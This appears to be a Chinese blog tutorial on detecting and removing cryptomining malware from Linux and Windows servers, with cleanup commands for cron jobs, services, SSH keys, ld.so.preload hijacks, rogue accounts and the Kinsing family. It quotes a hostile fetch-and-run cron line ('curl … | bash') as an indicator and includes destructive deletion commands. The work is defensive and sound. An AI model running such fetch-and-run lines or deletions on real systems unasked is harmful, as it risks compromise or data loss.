最近某公司服务器CPU突然飙升至99%,排查发现是挖矿病毒在作祟。这类病毒会占用服务器资源进行加密货币挖矿,导致业务卡顿甚至瘫痪。本文将一步步教你识别和清除挖矿病毒!
挖矿病毒通常通过弱密码或漏洞入侵,在后台悄悄运行消耗资源。它们常伪装成系统文件,并通过多种方式维持运行。
1. Linux系统处置流程
(1)第一步:断网阻传播
发现异常后,先切断病毒与外界的联系:
# 查看异常网络连接(重点关注IP地址陌生的连接)
netstat -antp | grep ESTABLISHED
# 封禁可疑IP(将1.2.3.4替换为实际可疑IP)
iptables -A INPUT -s 1.2.3.4 -j DROP # 禁止该IP访问本机
iptables -A OUTPUT -d 1.2.3.4 -j DROP # 禁止本机访问该IP
(2)清除定时任务
病毒常设置定时任务自我恢复:
# 检查当前用户的定时任务
crontab -l
# 检查系统级定时任务(重点路径)
ls /etc/cron.*/* /var/spool/cron/*
发现可疑任务(如curl http://恶意地址 | bash)立即删除:
crontab -e # 编辑当前用户任务
# 或直接删除文件:rm /etc/cron.d/suspicious_task
(3)检查自启动服务
病毒可能注册为系统服务:
# 查看所有开机自启服务
systemctl list-unit-files --state=enabled
# 检查可疑服务文件
ls /etc/systemd/system/*.service
发现异常服务(如名称随机的.service文件)后:
systemctl stop bad-service # 停止服务
systemctl disable bad-service # 禁用自启
rm /etc/systemd/system/bad-service.service # 删除配置文件
(4)检查SSH后门
病毒可能添加免密登录密钥:
# 检查授权密钥文件
cat ~/.ssh/authorized_keys # 当前用户
cat /root/.ssh/authorized_keys # root用户
删除所有不认识的公钥(形如ssh-rsa AAAA...的文本)
(5)解除系统命令劫持
病毒可能劫持常用命令:
# 检查预加载劫持
cat /etc/ld.so.preload # 正常应为空
# 解除劫持
echo "" > /etc/ld.so.preload
(6)排查可疑账户
# 查看所有系统账户
cat /etc/passwd | cut -d: -f1
# 检查新增账户日志
grep "useradd" /var/log/auth.log
发现异常账户(如hacker)后删除:
userdel -r hacker # 删除账户及家目录
(7)清理病毒进程
top # 按P按CPU排序,记录高占用PID
ls -l /proc/1234/exe # 查看PID=1234的进程路径
kill -9 1234 # 结束进程
rm -f /path/to/virus # 删除病毒文件
2. 常见挖矿病毒专杀
(1)Cleanfda病毒
特征:篡改系统命令
# 恢复被修改的命令
cp /bin/ps.original /bin/ps
# 删除病毒文件
rm -f /etc/upat.sh
(2)Kinsing家族病毒
特征:计划任务含gi.sh
# 清除恶意任务
grep -rl "gi.sh" /etc/cron* | xargs rm -f
# 删除劫持文件
rm /lib/systemd/system/bot.service
3. Windows系统处置
(1)定位病毒进程
打开任务管理器 → 按CPU排序 → 记录高占用进程
(2)分析进程详情
管理员运行PowerShell:
# 查看进程详细信息
Get-WmiObject Win32_Process -Filter "ProcessId=1234" | Select CommandLine
(3)终止并删除
Stop-Process -Id 1234 -Force
Remove-Item "C:\恶意路径\virus.exe" -Force
(4)检查定时任务
schtasks /query /fo TABLE # 查看所有任务
schtasks /delete /tn "恶意任务名" /f # 删除任务
(5)检查Hosts文件
打开C:\Windows\System32\drivers\etc\hosts
删除包含矿池地址的行(如pool.minexmr.com)
总结
挖矿病毒处置三步走:
- 1. 断网:阻断病毒通信
- 2. 清源:删除病毒文件/任务/账户
- 3. 加固:修复漏洞加强防护